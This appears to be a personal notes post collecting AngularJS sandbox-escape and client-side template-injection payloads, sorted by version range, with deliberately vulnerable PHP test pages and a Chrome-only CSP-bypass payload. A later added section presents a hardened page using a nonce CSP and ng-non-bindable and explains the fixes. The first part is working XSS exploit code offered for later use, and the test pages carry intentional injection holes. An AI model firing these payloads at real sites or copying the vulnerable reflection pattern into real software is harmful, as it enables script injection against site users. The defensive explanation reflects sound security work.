I haven't studied JS properly, so I'm just jotting down these payloads to use later.

```html
<html ng-app>
<head>
<script src="https://code.angularjs.org/{version}/angular.min.js"></script>
</head>
<body>
<p>
<?php
$q = $_GET['q'];
echo htmlspecialchars($q,ENT_QUOTES);
?>
</p>
</body>
</html>
```

Payloads

v1.0.1-v1.1.5

```
?q={{ constructor.constructor('alert(1)')() }}
```

v1.2.0-v1.2.18

```
?q={{ a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')() }}
```

v1.2.19-v1.2.23

```
?q={{ toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)  }}
```

v1.2.24-v1.2.26

(the payload for this range is only shown as an image in the original post)

v1.2.27-v1.2.29/v1.3.0-v1.3.20

```
?q={{ {}.")));alert(1)//"; }}
```

In actual testing this worked on v1.2.20-v1.2.32 and v1.3.0-v1.3.20.

v1.4.0-v1.4.5 (Chrome only)

```
?q={{ o={};l=o[['__lookupGetter__']];(l=l)('event')().target.defaultView.location='javascript:alert(1)'; }}
```

v1.4.5-v1.5.8 (Chrome only)

```
?q={{ x={y:''.constructor.prototype};x.y.charAt=[].join;[1]|orderBy:'x=alert(1)' }}
```

v1.6.0-v1.6.6

```
?q={{ [].pop.constructor('alert(1)')() }}
```

CSP bypass (Chrome only, v1.4.0-v1.6.6)

```html
<html ng-app>
<head>
<?php
header("Content-Security-Policy:default-src 'self';script-src code.angularjs.org 'self'");
?>
<script src="https://code.angularjs.org/{version}/angular.min.js"></script>
</head>
<body>
<p>
<?php
echo $_GET['q'];
?>
</p>
</body>
</html>
```
```
?q=<input+autofocus ng-focus="$event.path|orderBy:'!x?[].constructor.from([x=1],alert):0'">
```
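As an added defensive example (not part of the original post, and not code from the AngularJS project): a hardened version of the two test pages above. It keeps the same layout and the `{version}` placeholder; the nonce-based CSP and the `ng-non-bindable` attribute are the added mitigations.

```php
<?php
// Added example, not from the original post. Hardened form of the test pages
// above: same "q" query parameter reflected into a page that loads AngularJS.

// 1. Per-response nonce instead of whitelisting code.angularjs.org.
//    A host whitelist lets any injected <script src=...> load from that host,
//    including AngularJS itself, which is what the CSP-bypass payload above
//    relies on. A nonce only permits the script tags this page emits.
$nonce = base64_encode(random_bytes(16));
header("Content-Security-Policy: default-src 'self'; script-src 'nonce-{$nonce}'");

// 2. HTML-encode the reflected value. This stops markup injection, but it does
//    NOT stop AngularJS template injection on its own: "{{" and "}}" are not
//    HTML-special, so they pass through htmlspecialchars() untouched and are
//    then evaluated client-side by Angular's interpolation.
$q = htmlspecialchars($_GET['q'] ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');
?>
<html ng-app>
<head>
<script nonce="<?= $nonce ?>" src="https://code.angularjs.org/{version}/angular.min.js"></script>
</head>
<body>
<!-- 3. ng-non-bindable tells Angular not to compile or interpolate this
        subtree, so user-controlled text is never treated as an expression. -->
<p ng-non-bindable><?= $q ?></p>
</body>
</html>
```

The two test pages fail for different reasons: the first encodes HTML correctly but still lets Angular interpolate the reflected text, so the sandbox-escape payloads run inside `{{ }}`; the second does not encode at all and relies on a CSP whose script-src whitelist includes the very host that serves AngularJS, so the directive-based payload both injects markup and finds an allowed script gadget. Fixing the first page needs `ng-non-bindable` (or keeping untrusted text outside the `ng-app` scope) in addition to output encoding; fixing the second needs output encoding plus a nonce- or hash-based CSP rather than a host whitelist. Upgrading to a current AngularJS release, or moving off the 1.x line, removes the specific expression-sandbox bugs but does not replace these controls.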